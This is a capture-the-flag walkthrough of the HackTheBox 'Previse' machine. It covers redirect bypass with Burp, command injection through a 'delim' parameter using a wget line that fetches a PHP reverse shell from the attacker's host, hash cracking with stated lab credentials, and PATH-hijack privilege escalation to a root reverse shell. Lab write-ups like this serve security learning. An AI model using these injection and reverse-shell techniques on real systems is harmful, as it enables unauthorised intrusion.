In this post, I would like to share a walkthrough of the Previse Machine from HackTheBox

This room has been considered difficulty rated as an Easy machine on HackThebox

What will you gain from Previse machine?

For user flag, you will get a file from the website and get a shell using burpsite

As for the root flag, you need to execute some Path Injection to get a root reverse shell

Information Gathering

Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

Let’s try to open the website

We have been redirected to a Previse File Storage login page where I cannot find any useful information to be used from here.

Let’s run gobuster to enumerate any interesting directory that has been using PHP file format.

The command to use here can be something such as

gobuster dir -u http://<machine’s ip> -w /usr/share/wordlists/dirb/common.txt -x php

We managed to get a few interesting files such as config.php on the gobuster result.

Oh, wait! We also managed to get status 403 and 302 on certain directories from the result.

For more information on those status codes, we need to do some research on the internet and managed to find the information over here

Next, we should be opening BurpSuite Tools to inspect the web packet.

Once we have Burpsuite started, we need to go to Proxy > Options where we need to add a match/replace rule. We need to redirect a 302 Found status code to replace it with a 200 OK status code

Let’s try to access the accounts.php directory with the support from BurpSuite

Gaining the Privileges Access

The website has been loading for a while now, so let’s see on the BurpSuite

On the intercept section, I notice that we have a website packet that needed to be forwarded to the website.

After we have forwarded the packet, we managed to get a page that requires the creation of a new account.

A new user was added to the system database where we should be able to see the Dashboard

From the screenshot above, we should try to roam within the website in case obtaining useful details

On the files section, there’s a file called SITEBACKUP.ZIP where we should be able to download the file into our machine.

We need to unzip the file where we can see a bunch of PHP files such as shown in the screenshot above. We should read all files, but one file has caught my eye such as config.php

There’s a configuration on MySQL connection but sadly, we cannot use the credentials right now. However, we should save the user and password from config.php which might be useful in the future.

The only problem that we faced right now is how can we get a reverse shell on the machine itself.

While looking within other files, we stumbled on an interesting file (logs.php) where we can see {$_POST[‘delim’]} function inside the file.

We also notice that there’s a log data section under the Management Menu column on the website

The page should look something like above where we should be getting a file after clicking the Submit button

When I opened the file, I notice there were a lot of lines within the file. We might find the username that can be logged into the machine

BurpSuite Intercept

Let’s analyze the flow by using BurpSuite where we should be able to notice that a Request body that shows delim=comma

We should modify the php-reverse-shell.php with my own IP and choose PORT

A few things that we should be running from our attacker’s machine such as the python server and netstat/nc

After those have been started, we should be able to get a reverse shell by using BurpSuite

On the BurpSuite request, we can add a separate command which retrieves our php-reverse-shell.php by using delim=comma|wget http://<ip>:<port>/php-reverse-shell.php

Sadly, we got a 302 Found on the Request Header which shouldn’t be happening to us.

How to solve these issues?

After a while, we should retry the website by logging back to the website

Aside from that, I have renamed the php-reverse-shell to shell.php just in case

Once we have fully modified it, we should try to get a reverse shell again.

It is looking surprisingly good so far and let’s continue to the next step.

Boom! We got a reverse shell on our attacker’s machine.

MySQL enumeration on previse machine

Let’s enumerate the database by using the credentials that we found earlier. Sadly, we got a MySQL syntax error from that command.

My bad! I have run the wrong command previously and I am just running the correct command right now. Surprisingly, it works like charm!

We also can read the username and password that have been stored inside MySQL (my username is there too)

For us to get the password, we need to crack the hash that we found in MySQL

For that purpose, we can use hashcat tool which it can provide you with the password

As a result, we have the credentials as shown below:

• username: m4lwhere
• password: ilovecody112235!

Maintaining Privileges Access on Previse Machine

We can access the machine via SSH service by using the credentials that we found previously.

We can read the user flag by executing the command “cat user.txt“

Escalate to Root Privileges Access on Previse machine

For us to get escalation to root, we need to find the SUID file that we can use to abuse.

By typing the command “sudo -l” and we managed to be aware of /opt/scripts/access_backup.sh

While reading the file access_backup.sh, we know that we can run some commands from anywhere inside the machine.

I have created a gzip file that contains a reverse shell command (bash command) under /dev/shm directory

We need to give permission to execute the gzip file

We should be exporting the PATH into the mentioned command above.

Next, we should be running the SUID file using sudo permission, but we need to start our listener before executing it.

Voila! We get a shell back to us as Root Access and we can read the root flag by using the command “cat /root/root.txt“